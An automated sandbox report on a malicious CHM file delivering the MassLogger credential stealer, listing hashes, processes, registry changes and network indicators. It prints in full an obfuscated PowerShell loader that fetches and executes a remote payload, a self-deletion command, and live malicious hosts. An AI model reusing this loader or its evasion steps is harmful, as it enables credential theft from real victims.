File name:

doc.chm

Full analysis: https://app.any.run/tasks/61a8f81c-2c67-4615-b690-2b17b064191c
Verdict: Malicious activity
Threats:

MassLogger is a credential stealer and keylogger first identified in April 2020. It has been actively used in cyber campaigns to exfiltrate sensitive information from compromised systems. It is designed for easy use by less tech-savvy actors and is prominent for the capability of spreading via USB drives. It targets both individuals and organizations in various industries, mostly in Europe and the USA.

Analysis date: October 20, 2020, 06:09:10
OS: Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:
evasion
trojan
masslogger
stealer
Indicators:
MIME: application/octet-stream
File info: MS Windows HtmlHelp Data
MD5:

301D4B2815D8EEB2A8BA5668A269D2BF

SHA1:

F0967158669AC3BB751F040064A5BBCD4BF5013F

SHA256:

A5E610B7CA55722AC964E6E589776A8304B2D3E532D2CE54FF50FEAEE89ADBC3

SSDEEP:

48:PZzgXA0BmQRlEFlErlEll5su816r1yHkLA45MwAWcYWcCav9YYDB8c7Z6WDJhx+K:PdwYp816r1DAZMcYFdV1DectbxuMlz

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Actions looks like stealing of personal data

      • RegAsm.exe (PID: 2548)
    • MASSLOGGER was detected

      • RegAsm.exe (PID: 2548)
  • SUSPICIOUS

    • Executes PowerShell scripts

      • hh.exe (PID: 2180)
      • RegAsm.exe (PID: 2548)
    • Reads internet explorer settings

      • hh.exe (PID: 2180)
    • Creates files in the user directory

      • hh.exe (PID: 2180)
      • Powershell.exe (PID: 2932)
      • powershell.exe (PID: 996)
    • Reads the machine GUID from the registry

      • Powershell.exe (PID: 2932)
    • Checks supported languages

      • RegAsm.exe (PID: 2548)
    • Checks for external IP

      • RegAsm.exe (PID: 2548)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.chi | Windows HELP Index (81)
.chm | Windows HELP File (18.9)

EXIF

EXE

CHMVersion: 3
LanguageCode: English (U.S.)
No data.
All screenshots are available in the full report
Total processes
43
Monitored processes
4
Malicious processes
3
Suspicious processes
0

Behavior graph

start -> hh.exe (no specs) -> powershell.exe -> regasm.exe (#MASSLOGGER) -> powershell.exe (no specs)

Process information

PID
CMD
Path
Indicators
Parent process
PID:
996
CMD:
"powershell" Start-Sleep -Seconds 2; Remove-Item -path 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe'
Path:
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Parent process:
RegAsm.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\systemroot\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
PID:
2180
CMD:
"C:\Windows\hh.exe" C:\Users\admin\Desktop\doc.chm
Path:
C:\Windows\hh.exe
Parent process:
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® HTML Help Executable
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\hh.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\hhctrl.ocx
c:\windows\system32\user32.dll
PID:
2548
CMD:
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Path:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Parent process:
Powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft .NET Assembly Registration Utility
Exit code:
0
Version:
4.7.3062.0 built by: NET472REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\regasm.exe
c:\systemroot\system32\ntdll.dll
c:\systemroot\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\mscoree.dll
PID:
2932
CMD:
"C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe" -WindowStyle Hidden Set-PSReadlineOption -HistorySaveStyle SaveNothing;$diyyJ='D4%C7%72%72%02%E6%96%F6%A6%D2%02%37%27%16%86%34%96%96%36%37%16%42%02%D3%76%E6%96%27%47%35%96%96%36%37%16%42%B3%D7%22%F5%42%87%03%22%D5%56%47%97%26%B5%D5%27%16%86%36%B5%B7%02%47%36%56%A6%26%F4%D2%86%36%16%54%27%F6%64%C7%02%72%32%72%02%47%96%C6%07%37%D2%02%67%D6%42%02%D3%37%27%16%86%34%96%96%36%37%16%42%B3%92%72%76%07%A6%E2%24%43%F2%27%76%E2%E6%F6%96%37%96%67%F6%47%07%F6%F2%F2%A3%07%47%47%86%72%C2%46%F6%86%47%56%D4%A3%A3%D5%56%07%97%45%C6%C6%16%34%E2%36%96%37%16%24%C6%16%57%37%96%65%E2%47%66%F6%37%F6%27%36%96%D4%B5%C2%72%76%E6%96%27%47%35%46%16%F6%C6%E6%77%F6%44%72%C2%97%47%47%42%82%56%D6%16%E6%97%24%C6%C6%16%34%A3%A3%D5%E6%F6%96%47%36%16%27%56%47%E6%94%E2%36%96%37%16%24%C6%16%57%37%96%65%E2%47%66%F6%37%F6%27%36%96%D4%B5%02%D3%67%D6%42%B3%92%72%36%96%37%16%24%C6%16%57%37%96%65%E2%47%66%F6%37%F6%27%36%96%D4%72%82%56%D6%16%E4%C6%16%96%47%27%16%05%86%47%96%75%46%16%F6%C4%A3%A3%D5%97%C6%26%D6%56%37%37%14%E2%E6%F6%96%47%36%56%C6%66%56%25%E2%D6%56%47%37%97%35%B5%02%D5%46%96%F6%67%B5%B3%D4%C7%72%92%47%E6%56%72%B2%72%96%C6%34%26%72%B2%72%56%75%E2%47%72%B2%72%56%E4%02%47%36%72%B2%72%56%A6%26%F4%72%B2%72%D2%77%56%E4%82%72%D3%97%47%47%42%B3%23%23%07%42%02%D3%02%C6%F6%36%F6%47%F6%27%05%97%47%96%27%57%36%56%35%A3%A3%D5%27%56%76%16%E6%16%D4%47%E6%96%F6%05%56%36%96%67%27%56%35%E2%47%56%E4%E2%D6%56%47%37%97%35%B5%B3%92%23%73%03%33%02%C2%D5%56%07%97%45%C6%F6%36%F6%47%F6%27%05%97%47%96%27%57%36%56%35%E2%47%56%E4%E2%D6%56%47%37%97%35%B5%82%47%36%56%A6%26%F4%F6%45%A3%A3%D5%D6%57%E6%54%B5%02%D3%02%23%23%07%42%B3%92%76%E6%96%07%42%82%02%C6%96%47%E6%57%02%D7%47%56%96%57%15%D2%02%13%02%47%E6%57%F6%36%D2%02%D6%F6%36%E2%56%C6%76%F6%F6%76%02%07%D6%F6%36%D2%02%E6%F6%96%47%36%56%E6%E6%F6%36%D2%47%37%56%47%02%D3%02%76%E6%96%07%42%B7%02%F6%46%B3%56%E6%F6%26%45%42%02%D4%02%C6%16%37%B3%92%72%94%72%C2%72%E3%72%82%56%36%16%C6%07%56%27%E2%72%85%54%E3%72%D3%56%E6%F6%26%45%42';$text =$diyyJ.ToCharArray();[Array]::Reverse($text);$tu=-join $text;$jm=$tu.Split('%') | forEach {[char]([convert]::toint16($_,16))};$jm -join ''|I`E`X
Path:
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
Parent process:
hh.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
Total events
813
Read events
667
Write events
146
Delete events
0

Modification events

(PID) Process:
(2180) hh.exe
Key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:
write
Name:
ProxyBypass
Value:
1
(PID) Process:
(2180) hh.exe
Key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:
write
Name:
IntranetName
Value:
1
(PID) Process:
(2180) hh.exe
Key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:
write
Name:
UNCAsIntranet
Value:
1
(PID) Process:
(2180) hh.exe
Key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:
write
Name:
AutoDetect
Value:
0
(PID) Process:
(2180) hh.exe
Key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:
write
Name:
CachePrefix
Value:
(PID) Process:
(2180) hh.exe
Key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:
write
Name:
CachePrefix
Value:
Cookie:
(PID) Process:
(2180) hh.exe
Key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:
write
Name:
CachePrefix
Value:
Visited:
(PID) Process:
(2932) Powershell.exe
Key:
HKEY_CLASSES_ROOT\Local Settings\MuiCache\13B\52C64B7E
Operation:
write
Name:
LanguageList
Value:
en-US
(PID) Process:
(2932) Powershell.exe
Key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Powershell_RASAPI32
Operation:
write
Name:
EnableFileTracing
Value:
0
(PID) Process:
(2932) Powershell.exe
Key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Powershell_RASAPI32
Operation:
write
Name:
EnableConsoleTracing
Value:
0
Executable files
0
Suspicious files
3
Text files
0
Unknown types
1

Dropped files

PID
Process
Filename
Type
PID:
2180
Process:
hh.exe
Filename:
C:\Users\admin\AppData\Local\Temp\IMTF1D8.tmp
MD5:
SHA256:
PID:
2932
Process:
Powershell.exe
Filename:
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TDU1X1495EG4O1VGQU4O.temp
MD5:
SHA256:
PID:
996
Process:
powershell.exe
Filename:
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\76QPLXIBPVYC4VFE4G6B.temp
MD5:
SHA256:
PID:
2180
Process:
hh.exe
Filename:
C:\Users\admin\AppData\Roaming\Microsoft\HTML Help\hh.dat
Type:
chm
MD5:
SHA256:
PID:
996
Process:
powershell.exe
Filename:
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Type:
binary
MD5:
SHA256:
PID:
2932
Process:
Powershell.exe
Filename:
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Type:
binary
MD5:
SHA256:
PID:
2932
Process:
Powershell.exe
Filename:
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF19fc58.TMP
Type:
binary
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
4
DNS requests
5
Threats
5

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2932
Powershell.exe
GET
200
78.47.203.8:80
http://optovision.gr/4B.jpg
DE
text
2.59 Mb
unknown
2548
RegAsm.exe
GET
200
50.17.193.91:80
http://api.ipify.org/
US
text
15 b
shared

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2932
Powershell.exe
78.47.203.8:80
optovision.gr
Hetzner Online GmbH
DE
unknown
2548
RegAsm.exe
50.17.193.91:80
api.ipify.org
Amazon.com, Inc.
US
suspicious
5.189.152.112:59331
med-star.gr
Contabo GmbH
DE
malicious
2548
RegAsm.exe
5.189.152.112:21
med-star.gr
Contabo GmbH
DE
malicious

DNS requests

Domain
IP
Reputation
google.com
  • 216.58.212.142
malicious
optovision.gr
  • 78.47.203.8
unknown
dns.msftncsi.com
  • 131.107.255.255
shared
api.ipify.org
  • 50.17.193.91
  • 23.21.126.66
  • 23.21.109.69
  • 54.225.169.28
  • 54.235.98.120
  • 54.204.14.42
  • 54.225.66.103
  • 54.235.182.194
shared
med-star.gr
  • 5.189.152.112
malicious

Threats

PID
Process
Class
Message
2548
RegAsm.exe
Misc activity
SUSPICIOUS [PTsecurity] External IP Lookup (possible MassLogger)
2548
RegAsm.exe
Potential Corporate Privacy Violation
ET POLICY External IP Lookup api.ipify.org
2548
RegAsm.exe
Generic Protocol Command Decode
SURICATA Applayer Detect protocol only one direction
2 ETPRO signatures available at the full report
No debug info